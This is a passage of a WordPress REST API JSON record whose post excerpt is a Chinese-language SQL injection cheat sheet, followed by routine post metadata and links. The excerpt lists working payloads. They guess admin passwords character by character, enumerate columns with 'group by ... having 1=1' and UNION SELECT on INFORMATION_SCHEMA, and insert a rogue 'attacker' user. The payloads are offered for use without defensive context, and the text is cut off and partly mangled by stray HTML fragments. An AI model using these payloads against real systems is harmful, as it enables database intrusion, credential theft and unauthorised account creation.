left(name,2)=ab)—\u731c\u89e3\u7528\u6237\u5e10\u53f7\u7684\u7b2c\u4e8c\u4f4d \u5c31\u8fd9\u6837\u4e00\u6b21\u52a0\u4e00\u4e2a\u5b57\u7b26\u8fd9\u6837\u731c,\u731c\u5230\u591f\u4f60\u521a\u624d\u731c\u51fa\u6765\u7684\u591a\u5c11\u4f4d\u4e86\u5c31\u5bf9\u4e86,\u5e10\u53f7\u5c31\u7b97\u51fa\u6765\u4e86 and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) — \u8fd9\u4e2a\u67e5\u8be2\u8bed\u53e5\u53ef\u4ee5\u731c\u89e3\u4e2d\u6587\u7684\u7528\u6237\u548c_blank>\u5bc6\u7801.\u53ea\u8981\u628a\u540e\u9762\u7684\u6570\u5b57\u6362\u6210\u4e2d\u6587\u7684 ASSIC\u7801\u5c31OK.\u6700\u540e\u628a\u7ed3\u679c\u518d\u8f6c\u6362\u6210\u5b57\u7b26. group by users.id having 1=1– group by users.id, users.username, users.password, users.privs having 1=1– ; insert into users values( 666, attacker, foobar, 0xffff )– UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable- UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN (login_blank>_id)- UNION Select TOP 1 COLUMN_blank>_NAME FROM INFORMATION_blank>_SCHEMA.COLUMNS Where TABLE_blank>_NAME=logintable Where COLUMN_blank>_NAME NOT IN (login_blank>_id,login_blank>_name)- UNION Select …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_eb_attr":"","footnotes":""},"categories":[95],"tags":[],"class_list":["post-1687","post","type-post","status-publish","format-standard","hentry","category-95"],"_links":{"self":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1687","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1687"}],"version-history":[{"count":1,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1687\/revisions"}],"predecessor-version":[{"id":1688,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=\/wp\/v2\/posts\/1687\/revisions\/1688"}],"wp:attachment":[{"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1687"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1687"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oneai.eu.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1687"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}